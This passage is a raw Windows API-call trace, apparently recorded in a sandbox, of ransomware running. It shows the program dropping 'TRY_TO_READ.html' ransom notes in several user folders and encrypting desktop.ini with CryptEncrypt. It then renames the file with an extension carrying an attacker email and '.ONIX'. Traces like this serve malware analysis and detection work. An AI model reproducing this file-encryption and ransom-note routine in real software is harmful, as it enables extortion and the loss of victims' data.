(HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca90 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0065.339] GetLastError () returned 0x0 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454118 | out: hHeap=0x410000) returned 1 [0065.339] GetLastError () returned 0x0 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x472550 [0065.339] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0065.340] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472550 | out: hHeap=0x410000) returned 1 [0065.340] WriteFile (in: hFile=0x3f0, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.341] WriteFile (in: hFile=0x3f0, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.341] WriteFile (in: hFile=0x3f0, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.341] CloseHandle (hObject=0x3f0) returned 1 [0065.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0065.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.341] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0065.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.341] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.341] GetLastError () returned 0x0 [0065.341] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cae0 [0065.341] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f590 [0065.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cae0 | out: hHeap=0x410000) returned 1 [0065.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f590 | out: hHeap=0x410000) returned 1 [0065.341] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b80 [0065.341] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f590 [0065.341] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.342] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.342] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.342] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.342] GetLastError () returned 0x0 [0065.342] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.342] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.342] GetLastError () returned 0x0 [0065.342] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b320 [0065.342] CreateFileW (lpFileName="C:\\\\Users\\All Users\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0065.342] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.342] WriteFile (in: hFile=0x3f0, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.343] WriteFile (in: hFile=0x3f0, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.343] WriteFile (in: hFile=0x3f0, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.343] CloseHandle (hObject=0x3f0) returned 1 [0065.343] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0065.343] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.343] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.344] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.344] GetLastError () returned 0x0 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f5b8 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447d28 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447d28 | out: hHeap=0x410000) returned 1 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f5b8 | out: hHeap=0x410000) returned 1 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.344] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.344] GetLastError () returned 0x0 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f5b8 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f5e0 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f5b8 | out: hHeap=0x410000) returned 1 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f5e0 | out: hHeap=0x410000) returned 1 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f5e0 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bb8 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.344] GetLastError () returned 0x0 [0065.344] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.344] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.344] GetLastError () returned 0x0 [0065.345] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b320 [0065.345] CreateFileW (lpFileName="C:\\\\Users\\Default User\\TRY_TO_READ.html" (normalized: "c:\\users\\default user\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0065.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.345] WriteFile (in: hFile=0x3f0, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.346] WriteFile (in: hFile=0x3f0, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.346] WriteFile (in: hFile=0x3f0, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.346] CloseHandle (hObject=0x3f0) returned 1 [0065.346] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0065.346] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.346] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.346] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bb8 | out: hHeap=0x410000) returned 1 [0065.346] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.346] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.346] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.346] GetLastError () returned 0x0 [0065.346] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f5b8 [0065.347] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bb8 [0065.347] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.347] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.347] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bb8 | out: hHeap=0x410000) returned 1 [0065.347] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f5b8 | out: hHeap=0x410000) returned 1 [0065.347] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bb8 [0065.347] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x484cb0 [0065.347] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.347] CreateFileW (lpFileName="C:\\\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x3f0 [0065.347] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.347] LockFile (hFile=0x3f0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xae, nNumberOfBytesToLockHigh=0x0) returned 1 [0065.347] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0065.347] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.347] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x484cb0 | out: pbBuffer=0x484cb0) returned 1 [0065.347] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665b8 | out: pbBuffer=0x4665b8) returned 1 [0065.347] SetFileAttributesW (lpFileName="C:\\\\Users\\desktop.ini", dwFileAttributes=0x80) returned 1 [0065.348] lstrlenW (lpString="C:\\\\Users\\desktop.ini") returned 21 [0065.348] GetProcessHeap () returned 0x410000 [0065.348] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9a) returned 0x43e3f8 [0065.348] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Users\\desktop.ini" | out: lpString1="C:\\\\Users\\desktop.ini") returned="C:\\\\Users\\desktop.ini" [0065.348] lstrcatW (in: lpString1="C:\\\\Users\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.348] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=174) returned 1 [0065.348] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xae [0065.348] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0065.348] GetProcessHeap () returned 0x410000 [0065.348] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x484db8 [0065.348] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x484db8*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x484db8*, pdwDataLen=0x367f414*=0x100) returned 1 [0065.348] WriteFile (in: hFile=0x3f0, lpBuffer=0x484db8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x484db8*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0065.359] WriteFile (in: hFile=0x3f0, lpBuffer=0x4665b8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665b8*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0065.360] WriteFile (in: hFile=0x3f0, lpBuffer=0x4665b8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665b8*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0065.361] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x473050 [0065.361] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x473108 [0065.361] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.361] ReadFile (in: hFile=0x3f0, lpBuffer=0x473050, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesRead=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0065.361] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.362] WriteFile (in: hFile=0x3f0, lpBuffer=0x473108*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473108*, lpNumberOfBytesWritten=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0065.363] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0065.363] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.363] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xae, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0065.363] CloseHandle (hObject=0x3f0) returned 1 [0065.364] GetProcessHeap () returned 0x410000 [0065.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x484db8 | out: hHeap=0x410000) returned 1 [0065.364] MoveFileExW (lpExistingFileName="C:\\\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="C:\\\\Users\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0065.366] GetProcessHeap () returned 0x410000 [0065.366] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.366] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x484cb0 | out: hHeap=0x410000) returned 1 [0065.366] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.366] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bb8 | out: hHeap=0x410000) returned 1 [0065.366] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0065.367] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.367] GetLastError () returned 0x0 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bb8 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f5b8 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.367] GetLastError () returned 0x0 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.367] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.367] GetLastError () returned 0x0 [0065.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b320 [0065.367] CreateFileW (lpFileName="C:\\\\Users\\Public\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0065.367] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.368] WriteFile (in: hFile=0x3f0, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.368] WriteFile (in: hFile=0x3f0, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.369] WriteFile (in: hFile=0x3f0, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.369] CloseHandle (hObject=0x3f0) returned 1 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.369] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.369] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.369] GetLastError () returned 0x0 [0065.369] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.369] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.369] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.369] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.369] CloseHandle (hObject=0x3cc) returned 1 [0065.369] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.369] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x463c48 | out: hHeap=0x410000) returned 1 [0065.369] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.370] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x12)) [0065.370] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.370] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.370] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, 